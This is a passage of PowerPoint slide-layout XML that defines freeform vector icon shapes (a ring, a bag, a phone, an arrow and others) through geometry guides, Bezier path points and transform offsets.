                  <a:gd name="T7" fmla="*/ 0 h 344"/>
                  <a:gd name="T8" fmla="*/ 258 w 328"/>
                  <a:gd name="T9" fmla="*/ 0 h 344"/>
                  <a:gd name="T10" fmla="*/ 68 w 328"/>
                  <a:gd name="T11" fmla="*/ 0 h 344"/>
                  <a:gd name="T12" fmla="*/ 23 w 328"/>
                  <a:gd name="T13" fmla="*/ 0 h 344"/>
                  <a:gd name="T14" fmla="*/ 4 w 328"/>
                  <a:gd name="T15" fmla="*/ 19 h 344"/>
                  <a:gd name="T16" fmla="*/ 23 w 328"/>
                  <a:gd name="T17" fmla="*/ 38 h 344"/>
                  <a:gd name="T18" fmla="*/ 82 w 328"/>
                  <a:gd name="T19" fmla="*/ 38 h 344"/>
                  <a:gd name="T20" fmla="*/ 0 w 328"/>
                  <a:gd name="T21" fmla="*/ 180 h 344"/>
                  <a:gd name="T22" fmla="*/ 164 w 328"/>
                  <a:gd name="T23" fmla="*/ 344 h 344"/>
                  <a:gd name="T24" fmla="*/ 328 w 328"/>
                  <a:gd name="T25" fmla="*/ 180 h 344"/>
                  <a:gd name="T26" fmla="*/ 246 w 328"/>
                  <a:gd name="T27" fmla="*/ 38 h 344"/>
                  <a:gd name="T28" fmla="*/ 164 w 328"/>
                  <a:gd name="T29" fmla="*/ 305 h 344"/>
                  <a:gd name="T30" fmla="*/ 39 w 328"/>
                  <a:gd name="T31" fmla="*/ 180 h 344"/>
                  <a:gd name="T32" fmla="*/ 164 w 328"/>
                  <a:gd name="T33" fmla="*/ 55 h 344"/>
                  <a:gd name="T34" fmla="*/ 289 w 328"/>
                  <a:gd name="T35" fmla="*/ 180 h 344"/>
                  <a:gd name="T36" fmla="*/ 164 w 328"/>
                  <a:gd name="T37" fmla="*/ 305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344">
                    <a:moveTo>
                      <a:pt x="246" y="38"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="301" y="38"/>
                      <a:pt x="301" y="38"/>
                      <a:pt x="301" y="38"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="312" y="38"/>
                      <a:pt x="320" y="29"/>
                      <a:pt x="320" y="19"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="320" y="9"/>
                      <a:pt x="312" y="0"/>
                      <a:pt x="301" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="258" y="0"/>
                      <a:pt x="258" y="0"/>
                      <a:pt x="25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0"/>
                      <a:pt x="4" y="9"/>
                      <a:pt x="4" y="19"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="29"/>
                      <a:pt x="13" y="38"/>
                      <a:pt x="23" y="38"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="82" y="38"/>
                      <a:pt x="82" y="38"/>
                      <a:pt x="82" y="38"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="33" y="66"/>
                      <a:pt x="0" y="119"/>
                      <a:pt x="0" y="180"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="271"/>
                      <a:pt x="74" y="344"/>
                      <a:pt x="164" y="344"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="255" y="344"/>
                      <a:pt x="328" y="271"/>
                      <a:pt x="328" y="180"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="328" y="119"/>
                      <a:pt x="295" y="66"/>
                      <a:pt x="246" y="38"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="164" y="305"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="95" y="305"/>
                      <a:pt x="39" y="249"/>
                      <a:pt x="39" y="180"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="39" y="111"/>
                      <a:pt x="95" y="55"/>
                      <a:pt x="164" y="55"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="233" y="55"/>
                      <a:pt x="289" y="111"/>
                      <a:pt x="289" y="180"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="289" y="249"/>
                      <a:pt x="233" y="305"/>
                      <a:pt x="164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28DAD02B-BD07-4E95-A448-FBFB1B8B34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20058153" flipH="1" flipV="1">
              <a:off x="1224923" y="5452933"/>
              <a:ext cx="687388" cy="722312"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 164 w 183"/>
                <a:gd name="T1" fmla="*/ 192 h 192"/>
                <a:gd name="T2" fmla="*/ 19 w 183"/>
                <a:gd name="T3" fmla="*/ 192 h 192"/>
                <a:gd name="T4" fmla="*/ 2 w 183"/>
                <a:gd name="T5" fmla="*/ 170 h 192"/>
                <a:gd name="T6" fmla="*/ 18 w 183"/>
                <a:gd name="T7" fmla="*/ 58 h 192"/>
                <a:gd name="T8" fmla="*/ 36 w 183"/>
                <a:gd name="T9" fmla="*/ 44 h 192"/>
                <a:gd name="T10" fmla="*/ 45 w 183"/>
                <a:gd name="T11" fmla="*/ 44 h 192"/>
                <a:gd name="T12" fmla="*/ 91 w 183"/>
                <a:gd name="T13" fmla="*/ 0 h 192"/>
                <a:gd name="T14" fmla="*/ 137 w 183"/>
                <a:gd name="T15" fmla="*/ 44 h 192"/>
                <a:gd name="T16" fmla="*/ 147 w 183"/>
                <a:gd name="T17" fmla="*/ 44 h 192"/>
                <a:gd name="T18" fmla="*/ 165 w 183"/>
                <a:gd name="T19" fmla="*/ 58 h 192"/>
                <a:gd name="T20" fmla="*/ 181 w 183"/>
                <a:gd name="T21" fmla="*/ 170 h 192"/>
                <a:gd name="T22" fmla="*/ 164 w 183"/>
                <a:gd name="T23" fmla="*/ 192 h 192"/>
                <a:gd name="T24" fmla="*/ 39 w 183"/>
                <a:gd name="T25" fmla="*/ 76 h 192"/>
                <a:gd name="T26" fmla="*/ 50 w 183"/>
                <a:gd name="T27" fmla="*/ 88 h 192"/>
                <a:gd name="T28" fmla="*/ 61 w 183"/>
                <a:gd name="T29" fmla="*/ 76 h 192"/>
                <a:gd name="T30" fmla="*/ 50 w 183"/>
                <a:gd name="T31" fmla="*/ 65 h 192"/>
                <a:gd name="T32" fmla="*/ 39 w 183"/>
                <a:gd name="T33" fmla="*/ 76 h 192"/>
                <a:gd name="T34" fmla="*/ 91 w 183"/>
                <a:gd name="T35" fmla="*/ 8 h 192"/>
                <a:gd name="T36" fmla="*/ 52 w 183"/>
                <a:gd name="T37" fmla="*/ 44 h 192"/>
                <a:gd name="T38" fmla="*/ 130 w 183"/>
                <a:gd name="T39" fmla="*/ 44 h 192"/>
                <a:gd name="T40" fmla="*/ 91 w 183"/>
                <a:gd name="T41" fmla="*/ 8 h 192"/>
                <a:gd name="T42" fmla="*/ 134 w 183"/>
                <a:gd name="T43" fmla="*/ 65 h 192"/>
                <a:gd name="T44" fmla="*/ 122 w 183"/>
                <a:gd name="T45" fmla="*/ 76 h 192"/>
                <a:gd name="T46" fmla="*/ 134 w 183"/>
                <a:gd name="T47" fmla="*/ 88 h 192"/>
                <a:gd name="T48" fmla="*/ 145 w 183"/>
                <a:gd name="T49" fmla="*/ 76 h 192"/>
                <a:gd name="T50" fmla="*/ 134 w 183"/>
                <a:gd name="T51" fmla="*/ 6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192">
                  <a:moveTo>
                    <a:pt x="164" y="192"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="19" y="192"/>
                    <a:pt x="19" y="192"/>
                    <a:pt x="19" y="192"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8" y="192"/>
                    <a:pt x="0" y="182"/>
                    <a:pt x="2" y="170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0"/>
                    <a:pt x="27" y="44"/>
                    <a:pt x="36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6" y="15"/>
                    <a:pt x="66" y="0"/>
                    <a:pt x="91" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="116" y="0"/>
                    <a:pt x="136" y="15"/>
                    <a:pt x="137" y="44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56" y="44"/>
                    <a:pt x="164" y="50"/>
                    <a:pt x="165" y="58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83" y="182"/>
                    <a:pt x="175" y="192"/>
                    <a:pt x="164" y="192"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="39" y="76"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="39" y="82"/>
                    <a:pt x="44" y="88"/>
                    <a:pt x="50" y="88"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="56" y="88"/>
                    <a:pt x="61" y="82"/>
                    <a:pt x="61" y="76"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="61" y="70"/>
                    <a:pt x="56" y="65"/>
                    <a:pt x="50" y="65"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="44" y="65"/>
                    <a:pt x="39" y="70"/>
                    <a:pt x="39" y="76"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="91" y="8"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="70" y="8"/>
                    <a:pt x="54" y="20"/>
                    <a:pt x="52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9" y="20"/>
                    <a:pt x="112" y="8"/>
                    <a:pt x="91" y="8"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="134" y="65"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="128" y="65"/>
                    <a:pt x="122" y="70"/>
                    <a:pt x="122" y="76"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="122" y="82"/>
                    <a:pt x="128" y="88"/>
                    <a:pt x="134" y="88"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="140" y="88"/>
                    <a:pt x="145" y="82"/>
                    <a:pt x="145" y="76"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="145" y="70"/>
                    <a:pt x="140" y="65"/>
                    <a:pt x="134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113">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82BC81DB-1690-472D-9441-C1009AF9ED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19964420">
              <a:off x="1462627" y="6236982"/>
              <a:ext cx="601663" cy="752475"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 143 w 160"/>
                <a:gd name="T1" fmla="*/ 0 h 200"/>
                <a:gd name="T2" fmla="*/ 16 w 160"/>
                <a:gd name="T3" fmla="*/ 0 h 200"/>
                <a:gd name="T4" fmla="*/ 0 w 160"/>
                <a:gd name="T5" fmla="*/ 17 h 200"/>
                <a:gd name="T6" fmla="*/ 0 w 160"/>
                <a:gd name="T7" fmla="*/ 183 h 200"/>
                <a:gd name="T8" fmla="*/ 16 w 160"/>
                <a:gd name="T9" fmla="*/ 200 h 200"/>
                <a:gd name="T10" fmla="*/ 143 w 160"/>
                <a:gd name="T11" fmla="*/ 200 h 200"/>
                <a:gd name="T12" fmla="*/ 160 w 160"/>
                <a:gd name="T13" fmla="*/ 183 h 200"/>
                <a:gd name="T14" fmla="*/ 160 w 160"/>
                <a:gd name="T15" fmla="*/ 17 h 200"/>
                <a:gd name="T16" fmla="*/ 143 w 160"/>
                <a:gd name="T17" fmla="*/ 0 h 200"/>
                <a:gd name="T18" fmla="*/ 78 w 160"/>
                <a:gd name="T19" fmla="*/ 193 h 200"/>
                <a:gd name="T20" fmla="*/ 68 w 160"/>
                <a:gd name="T21" fmla="*/ 183 h 200"/>
                <a:gd name="T22" fmla="*/ 78 w 160"/>
                <a:gd name="T23" fmla="*/ 173 h 200"/>
                <a:gd name="T24" fmla="*/ 88 w 160"/>
                <a:gd name="T25" fmla="*/ 183 h 200"/>
                <a:gd name="T26" fmla="*/ 78 w 160"/>
                <a:gd name="T27" fmla="*/ 193 h 200"/>
                <a:gd name="T28" fmla="*/ 148 w 160"/>
                <a:gd name="T29" fmla="*/ 164 h 200"/>
                <a:gd name="T30" fmla="*/ 12 w 160"/>
                <a:gd name="T31" fmla="*/ 164 h 200"/>
                <a:gd name="T32" fmla="*/ 12 w 160"/>
                <a:gd name="T33" fmla="*/ 12 h 200"/>
                <a:gd name="T34" fmla="*/ 148 w 160"/>
                <a:gd name="T35" fmla="*/ 12 h 200"/>
                <a:gd name="T36" fmla="*/ 148 w 160"/>
                <a:gd name="T37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0" h="200">
                  <a:moveTo>
                    <a:pt x="143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92"/>
                    <a:pt x="7" y="200"/>
                    <a:pt x="16" y="200"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="143" y="200"/>
                    <a:pt x="143" y="200"/>
                    <a:pt x="143" y="200"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="152" y="200"/>
                    <a:pt x="160" y="192"/>
                    <a:pt x="160" y="183"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="160" y="17"/>
                    <a:pt x="160" y="17"/>
                    <a:pt x="160" y="17"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="160" y="7"/>
                    <a:pt x="152" y="0"/>
                    <a:pt x="143" y="0"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="78" y="193"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="73" y="193"/>
                    <a:pt x="68" y="188"/>
                    <a:pt x="68" y="183"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="68" y="177"/>
                    <a:pt x="73" y="173"/>
                    <a:pt x="78" y="173"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="84" y="173"/>
                    <a:pt x="88" y="177"/>
                    <a:pt x="88" y="183"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="88" y="188"/>
                    <a:pt x="84" y="193"/>
                    <a:pt x="78" y="193"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="148" y="164"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="164"/>
                    <a:pt x="12" y="164"/>
                    <a:pt x="12" y="16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8" y="12"/>
                    <a:pt x="148" y="12"/>
                    <a:pt x="148" y="12"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="148" y="1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BEB98482-2E58-428B-807E-2EEA868AF2D0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="5400000">
              <a:off x="11860707" y="3912187"/>
              <a:ext cx="449186" cy="412150"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 253 w 473"/>
                <a:gd name="T1" fmla="*/ 0 h 434"/>
                <a:gd name="T2" fmla="*/ 0 w 473"/>
                <a:gd name="T3" fmla="*/ 218 h 434"/>
                <a:gd name="T4" fmla="*/ 253 w 473"/>
                <a:gd name="T5" fmla="*/ 434 h 434"/>
                <a:gd name="T6" fmla="*/ 253 w 473"/>
                <a:gd name="T7" fmla="*/ 303 h 434"/>
                <a:gd name="T8" fmla="*/ 473 w 473"/>
                <a:gd name="T9" fmla="*/ 303 h 434"/>
                <a:gd name="T10" fmla="*/ 473 w 473"/>
                <a:gd name="T11" fmla="*/ 133 h 434"/>
                <a:gd name="T12" fmla="*/ 253 w 473"/>
                <a:gd name="T13" fmla="*/ 133 h 434"/>
                <a:gd name="T14" fmla="*/ 253 w 473"/>
                <a:gd name="T15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3" h="434">
                  <a:moveTo>
                    <a:pt x="253" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="218"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="253" y="434"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="253" y="303"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="473" y="303"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="473" y="133"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="253" y="133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215A95EA-E87B-4A24-BF95-2C1B8CD14030}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm rot="12320893">
              <a:off x="11794249" y="4830164"/>
              <a:ext cx="282094" cy="805573"/>
              <a:chOff x="9469654" y="2159644"/>
              <a:chExt cx="752475" cy="2148831"/>
            </a:xfrm>
            <a:grpFill/>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="128" name="Freeform 11">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5B1EE172-8BFA-4D29-ADE0-F7BBB5ED5D0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469654" y="2954337"/>
                <a:ext cx="752475" cy="1354138"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 166 w 198"/>
                  <a:gd name="T1" fmla="*/ 0 h 359"/>
                  <a:gd name="T2" fmla="*/ 31 w 198"/>
                  <a:gd name="T3" fmla="*/ 0 h 359"/>
                  <a:gd name="T4" fmla="*/ 0 w 198"/>
                  <a:gd name="T5" fmla="*/ 31 h 359"/>
                  <a:gd name="T6" fmla="*/ 0 w 198"/>
                  <a:gd name="T7" fmla="*/ 31 h 359"/>
                  <a:gd name="T8" fmla="*/ 0 w 198"/>
                  <a:gd name="T9" fmla="*/ 32 h 359"/>
                  <a:gd name="T10" fmla="*/ 0 w 198"/>
                  <a:gd name="T11" fmla="*/ 323 h 359"/>
                  <a:gd name="T12" fmla="*/ 1 w 198"/>
                  <a:gd name="T13" fmla="*/ 323 h 359"/>
                  <a:gd name="T14" fmla="*/ 0 w 198"/>
                  <a:gd name="T15" fmla="*/ 327 h 359"/>
                  <a:gd name="T16" fmla="*/ 0 w 198"/>
                  <a:gd name="T17" fmla="*/ 328 h 359"/>
                  <a:gd name="T18" fmla="*/ 31 w 198"/>
                  <a:gd name="T19" fmla="*/ 359 h 359"/>
                  <a:gd name="T20" fmla="*/ 167 w 198"/>
                  <a:gd name="T21" fmla="*/ 359 h 359"/>
                  <a:gd name="T22" fmla="*/ 198 w 198"/>
                  <a:gd name="T23" fmla="*/ 328 h 359"/>
                  <a:gd name="T24" fmla="*/ 198 w 198"/>
                  <a:gd name="T25" fmla="*/ 327 h 359"/>
                  <a:gd name="T26" fmla="*/ 198 w 198"/>
                  <a:gd name="T27" fmla="*/ 323 h 359"/>
                  <a:gd name="T28" fmla="*/ 198 w 198"/>
                  <a:gd name="T29" fmla="*/ 323 h 359"/>
                  <a:gd name="T30" fmla="*/ 197 w 198"/>
                  <a:gd name="T31" fmla="*/ 32 h 359"/>
                  <a:gd name="T32" fmla="*/ 197 w 198"/>
                  <a:gd name="T33" fmla="*/ 31 h 359"/>
                  <a:gd name="T34" fmla="*/ 197 w 198"/>
                  <a:gd name="T35" fmla="*/ 30 h 359"/>
                  <a:gd name="T36" fmla="*/ 166 w 198"/>
                  <a:gd name="T37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8" h="359">
                    <a:moveTo>
                      <a:pt x="166" y="0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14" y="0"/>
                      <a:pt x="0" y="14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1" y="323"/>
                      <a:pt x="1" y="323"/>
                      <a:pt x="1" y="323"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="324"/>
                      <a:pt x="0" y="326"/>
                      <a:pt x="0" y="327"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="328"/>
                      <a:pt x="0" y="328"/>
                      <a:pt x="0" y="328"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="345"/>
                      <a:pt x="14" y="359"/>
                      <a:pt x="31" y="359"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="167" y="359"/>
                      <a:pt x="167" y="359"/>
                      <a:pt x="167" y="359"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="184" y="359"/>
                      <a:pt x="198" y="345"/>
                      <a:pt x="198" y="328"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="198" y="327"/>
                      <a:pt x="198" y="327"/>
                      <a:pt x="198" y="327"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="198" y="325"/>
                      <a:pt x="198" y="324"/>
                      <a:pt x="198" y="323"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="198" y="323"/>
                      <a:pt x="198" y="323"/>
                      <a:pt x="198" y="323"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="197" y="32"/>
                      <a:pt x="197" y="32"/>
                      <a:pt x="197" y="32"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="197" y="31"/>
                      <a:pt x="197" y="31"/>
                      <a:pt x="197" y="31"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="197" y="30"/>
                      <a:pt x="197" y="30"/>
                      <a:pt x="197" y="30"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="197" y="13"/>
                      <a:pt x="183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9" name="Freeform 14">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C04F6CE-02F7-43E0-A5CC-A0D937B99C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9502992" y="2710497"/>
                <a:ext cx="681038" cy="217488"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 179 w 179"/>
                  <a:gd name="T1" fmla="*/ 30 h 58"/>
                  <a:gd name="T2" fmla="*/ 151 w 179"/>
                  <a:gd name="T3" fmla="*/ 58 h 58"/>
                  <a:gd name="T4" fmla="*/ 28 w 179"/>
                  <a:gd name="T5" fmla="*/ 58 h 58"/>
                  <a:gd name="T6" fmla="*/ 0 w 179"/>
                  <a:gd name="T7" fmla="*/ 30 h 58"/>
                  <a:gd name="T8" fmla="*/ 0 w 179"/>
                  <a:gd name="T9" fmla="*/ 28 h 58"/>
                  <a:gd name="T10" fmla="*/ 28 w 179"/>
                  <a:gd name="T11" fmla="*/ 0 h 58"/>
                  <a:gd name="T12" fmla="*/ 151 w 179"/>
                  <a:gd name="T13" fmla="*/ 0 h 58"/>
                  <a:gd name="T14" fmla="*/ 179 w 179"/>
                  <a:gd name="T15" fmla="*/ 28 h 58"/>
                  <a:gd name="T16" fmla="*/ 179 w 179"/>
                  <a:gd name="T17" fmla="*/ 3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58">
                    <a:moveTo>
                      <a:pt x="179" y="30"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="179" y="46"/>
                      <a:pt x="167" y="58"/>
                      <a:pt x="151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12" y="58"/>
                      <a:pt x="0" y="46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51" y="0"/>
                      <a:pt x="151" y="0"/>
                      <a:pt x="151" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="167" y="0"/>
                      <a:pt x="179" y="12"/>
                      <a:pt x="179" y="28"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="179" y="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0" name="任意多边形 160">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{15EE5BB3-1E5B-4442-88A9-738BB3E0CB57}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="9552205" y="2159644"/>
                <a:ext cx="563563" cy="517625"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="connsiteX0" fmla="*/ 289397 w 563563"/>
                  <a:gd name="connsiteY0" fmla="*/ 0 h 517625"/>
                  <a:gd name="connsiteX1" fmla="*/ 392209 w 563563"/>
                  <a:gd name="connsiteY1" fmla="*/ 101862 h 517625"/>
                  <a:gd name="connsiteX2" fmla="*/ 392209 w 563563"/>
                  <a:gd name="connsiteY2" fmla="*/ 252767 h 517625"/>
                  <a:gd name="connsiteX3" fmla="*/ 498829 w 563563"/>
                  <a:gd name="connsiteY3" fmla="*/ 328220 h 517625"/>
                  <a:gd name="connsiteX4" fmla="*/ 563563 w 563563"/>
                  <a:gd name="connsiteY4" fmla="*/ 422537 h 517625"/>
                  <a:gd name="connsiteX5" fmla="*/ 563563 w 563563"/>
                  <a:gd name="connsiteY5" fmla="*/ 500886 h 517625"/>
                  <a:gd name="connsiteX6" fmla="*/ 563563 w 563563"/>
                  <a:gd name="connsiteY6" fmla="*/ 517625 h 517625"/>
                  <a:gd name="connsiteX7" fmla="*/ 0 w 563563"/>
                  <a:gd name="connsiteY7" fmla="*/ 517625 h 517625"/>
                  <a:gd name="connsiteX8" fmla="*/ 0 w 563563"/>
                  <a:gd name="connsiteY8" fmla="*/ 513787 h 517625"/>
                  <a:gd name="connsiteX9" fmla="*/ 0 w 563563"/>
                  <a:gd name="connsiteY9" fmla="*/ 422537 h 517625"/>
                  <a:gd name="connsiteX10" fmla="*/ 64734 w 563563"/>
                  <a:gd name="connsiteY10" fmla="*/ 328220 h 517625"/>
                  <a:gd name="connsiteX11" fmla="*/ 186585 w 563563"/>
                  <a:gd name="connsiteY11" fmla="*/ 252767 h 517625"/>
                  <a:gd name="connsiteX12" fmla="*/ 186585 w 563563"/>
                  <a:gd name="connsiteY12" fmla="*/ 101862 h 517625"/>
                  <a:gd name="connsiteX13" fmla="*/ 289397 w 563563"/>
                  <a:gd name="connsiteY13" fmla="*/ 0 h 51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3563" h="517625">
                    <a:moveTo>
                      <a:pt x="289397" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="346515" y="0"/>
                      <a:pt x="392209" y="45272"/>
                      <a:pt x="392209" y="101862"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="392209" y="101862"/>
                      <a:pt x="392209" y="101862"/>
                      <a:pt x="392209" y="252767"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="392209" y="252767"/>
                      <a:pt x="445519" y="279176"/>
                      <a:pt x="498829" y="328220"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="552139" y="377265"/>
                      <a:pt x="563563" y="422537"/>
                      <a:pt x="563563" y="422537"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="563563" y="422537"/>
                      <a:pt x="563563" y="422537"/>
                      <a:pt x="563563" y="500886"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="563563" y="517625"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="517625"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="513787"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="496103"/>
                      <a:pt x="0" y="467808"/>
                      <a:pt x="0" y="422537"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="422537"/>
                      <a:pt x="11424" y="377265"/>
                      <a:pt x="64734" y="328220"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="118044" y="279176"/>
                      <a:pt x="186585" y="252767"/>
                      <a:pt x="186585" y="252767"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="186585" y="252767"/>
                      <a:pt x="186585" y="252767"/>
                      <a:pt x="186585" y="101862"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="186585" y="45272"/>
                      <a:pt x="232279" y="0"/>
                      <a:pt x="28939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27" name="Freeform 124">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BE45A284-19A9-4A71-8829-1DBF92A27D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 rot="6524507">
              <a:off x="11685027" y="6473052"/>
              <a:ext cx="349593" cy="449070"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 12 w 156"/>
                <a:gd name="T1" fmla="*/ 200 h 200"/>
                <a:gd name="T2" fmla="*/ 0 w 156"/>
                <a:gd name="T3" fmla="*/ 37 h 200"/>
                <a:gd name="T4" fmla="*/ 12 w 156"/>
                <a:gd name="T5" fmla="*/ 175 h 200"/>
                <a:gd name="T6" fmla="*/ 50 w 156"/>
                <a:gd name="T7" fmla="*/ 187 h 200"/>
                <a:gd name="T8" fmla="*/ 64 w 156"/>
                <a:gd name="T9" fmla="*/ 24 h 200"/>
                <a:gd name="T10" fmla="*/ 156 w 156"/>
                <a:gd name="T11" fmla="*/ 37 h 200"/>
                <a:gd name="T12" fmla="*/ 144 w 156"/>
                <a:gd name="T13" fmla="*/ 200 h 200"/>
                <a:gd name="T14" fmla="*/ 128 w 156"/>
                <a:gd name="T15" fmla="*/ 180 h 200"/>
                <a:gd name="T16" fmla="*/ 116 w 156"/>
                <a:gd name="T17" fmla="*/ 168 h 200"/>
                <a:gd name="T18" fmla="*/ 116 w 156"/>
